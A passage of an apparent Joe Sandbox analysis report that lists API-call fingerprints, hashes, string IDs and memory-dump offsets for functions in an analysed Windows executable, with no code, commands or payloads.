                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandlePipe
                                                                          • String ID: nul
                                                                          • API String ID: 1424370930-2873401336
                                                                          • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                          • Instruction ID: 942202757bc0627a0a1f0b4ba5c6121fec61de5a34016c99b2e8a44c44ae4e81
                                                                          • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                          • Instruction Fuzzy Hash: 1A318272A1EA4689EB20AB24D454379B2A0FB85B78FD10334DA7D067E4EF3CD4468B11
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandlePipe
                                                                          • String ID: nul
                                                                          • API String ID: 1424370930-2873401336
                                                                          • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                          • Instruction ID: 8363ad518576864bbe5567911268ec8c758a632f4ec484daf3e419f7e9d056a9
                                                                          • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                          • Instruction Fuzzy Hash: D5218422E1EB4685F710AB24D454379A3A0FB85B78FE14335DA6E067E4EF7CD0068B20
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                          • String ID:
                                                                          • API String ID: 3220332590-0
                                                                          • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                          • Instruction ID: 36be6b77c2c0cbd638dd9494e20c743d360b1c96b37f288aecae1b1a1adace50
                                                                          • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                          • Instruction Fuzzy Hash: E5A1095AA1D25389E724AF3184087BD7371FF48B18F965135EE1947AA4FE3D9C02D320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: f$p
                                                                          • API String ID: 3215553584-1290815066
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
Similarity
• API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
• String ID:
• API String ID: 2082702847-0
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
Similarity
• API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1653399731-2785691316
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7ADC9BF47), ref: 00007FF7ADC9CE29
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2358735015-567219261
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
• GetForegroundWindow.USER32 ref: 00007FF7ADC70EDB
  • Part of subcall function 00007FF7ADC70B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7ADC70F61), ref: 00007FF7ADC70C6A
Similarity
• API ID: BuffCharForegroundUpperWindow
• String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
• API String ID: 3570115564-1994484594
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: #$E$O
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                          • String ID: \*.*
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: ErrorLasthtonsinet_ntoa
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                          • String ID:
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                          • String ID:
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D176
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D217
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D236
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D281
                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC9C2BF), ref: 00007FF7ADC9D2A0
                                                                            • Part of subcall function 00007FF7ADC24120: WideCharToMultiByte.KERNEL32 ref: 00007FF7ADC24160
                                                                            • Part of subcall function 00007FF7ADC24120: WideCharToMultiByte.KERNEL32 ref: 00007FF7ADC2419C
                                                                          Similarity
                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                          • String ID:
                                                                          • API String ID: 666041331-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                          • String ID:
                                                                          • API String ID: 4136290138-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                          • String ID:
                                                                          • API String ID: 2832842796-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID:
                                                                          • API String ID: 190572456-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable
                                                                          • String ID:
                                                                          • API String ID: 2939132127-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                          • String ID:
                                                                          • API String ID: 2655805287-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Window$ForegroundPixelRelease
                                                                          • String ID:
                                                                          • API String ID: 4156661090-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 2067211477-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                          • Instruction ID: 55b51291485122e1361b6491e3a3b96362578a3edfc093af42d0cebd10b1fddc
                                                                          • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                          • Instruction Fuzzy Hash: 61118836619B818AE710DF42E84015DBBB4FB88F80B964435CF9C03B64EF38E826C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                          • Instruction ID: 266768b831ff9e37cc6b69f499ee6493aba3dcf7680e4e161a59f6abf81ea0b5
                                                                          • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                          • Instruction Fuzzy Hash: BD114C36A19B41CAE711DF52F84055DB7A4FB88F80B964436DF8943B64EF38E816C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                          • Instruction ID: bc55ee6bf86ac0b6cf089e87ae6f49aaff1284d91ef499b9aab0ec409562591a
                                                                          • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                          • Instruction Fuzzy Hash: 54115222A0D98285EF65AF24E454779A360FF88B44FC58031D94D476A8FF7CD587C720
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC8003C
                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC80047
                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC80055
                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF7ADC8005E
                                                                            • Part of subcall function 00007FF7ADC7F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7ADC80063,?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC7F7C9
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7ADC629AD,?,?,?,00007FF7ADC12AB2), ref: 00007FF7ADC8006A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3142591903-0
                                                                          • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                          • Instruction ID: 78e9bbe98ca24e53727536861d7a0c7ae445746916ebb04bc67fbabdec23ed24
                                                                          • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                          • Instruction Fuzzy Hash: 69014C3AA19B419AE740AF15E44022DB360FB88B51F904035DB8D43B65DF3CD492C750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                          • Instruction ID: 507a0c5ceb07dca92b992e26665680c5ac9eb5f847ad442966c2be14f6d8ac9e
                                                                          • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                          • Instruction Fuzzy Hash: 17018C22D1E642AAE7557B10ADA43B8E725FF08B90FDA4130C95D0A2B0FF7DA4468220
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorExitLastThread
                                                                          • String ID:
                                                                          • API String ID: 1611280651-0
                                                                          • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                          • Instruction ID: 7ba4f121513692587f80ed2691ef20bf6f3d9a86139bb8cf8d87588fd2b841eb
                                                                          • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                          • Instruction Fuzzy Hash: 9C017C21B2EA429AEB0A7B20944417CE261EF40B74FD11734C63E036F1EF7CE85A8310
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                          • String ID:
                                                                          • API String ID: 179993514-0
                                                                          • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                          • Instruction ID: f881f712ff48a88768c0397327e41433aa7f851607028d82e5d2cc950b39b65a
                                                                          • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                          • Instruction Fuzzy Hash: 81F03010F2E6028AFF5537B5A8492789362FF8C741FD65030C80A42271FD2DE4975A20
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                          • String ID:
                                                                          • API String ID: 179993514-0
                                                                          • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                          • Instruction ID: 6405fb86df4693062914a6a96f72e9b6199d9cba77af48a11a4c53d66eeac3fc
                                                                          • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                          • Instruction Fuzzy Hash: 99F06510F2E7024AFF5937B268486789253FF4C741FD65030C90A42272FD7DE4974A60
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                          • String ID: .lnk
                                                                          • API String ID: 3769357847-24824748
                                                                          • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                          • Instruction ID: c0c817fde94935921c4a36692600a5190b297778200aa613979766768cbdb7d0
                                                                          • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                          • Instruction Fuzzy Hash: B1D16E36B0AA5689EB00EF66D0906ADB7B0EB49F89FC64032DE4D47765EF39D446C310
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                          • API String ID: 3215553584-1196891531
                                                                          • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                          • Instruction ID: 1b047c8e5f1319f6d548991aa17abe3f718f7f1c3b932cfd4ecf31b4069f81d1
                                                                          • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                          • Instruction Fuzzy Hash: D681D4B2D8E202ADFB757F15854C23DA6A2EF11740FC64035CA0E536E4FB2DE852E261
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID: !$acos
                                                                          • API String ID: 1156100317-2870037509
                                                                          • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                          • Instruction ID: ab46ab176de039b2cc68a0a2475a6cb44e14712646b5cfd1e6e7853c5c101bc6
                                                                          • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                          • Instruction Fuzzy Hash: 7261D421D2DF458CE2679B355811276E758EFA63C0FD28336E95E35A74EF6CE0838610
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
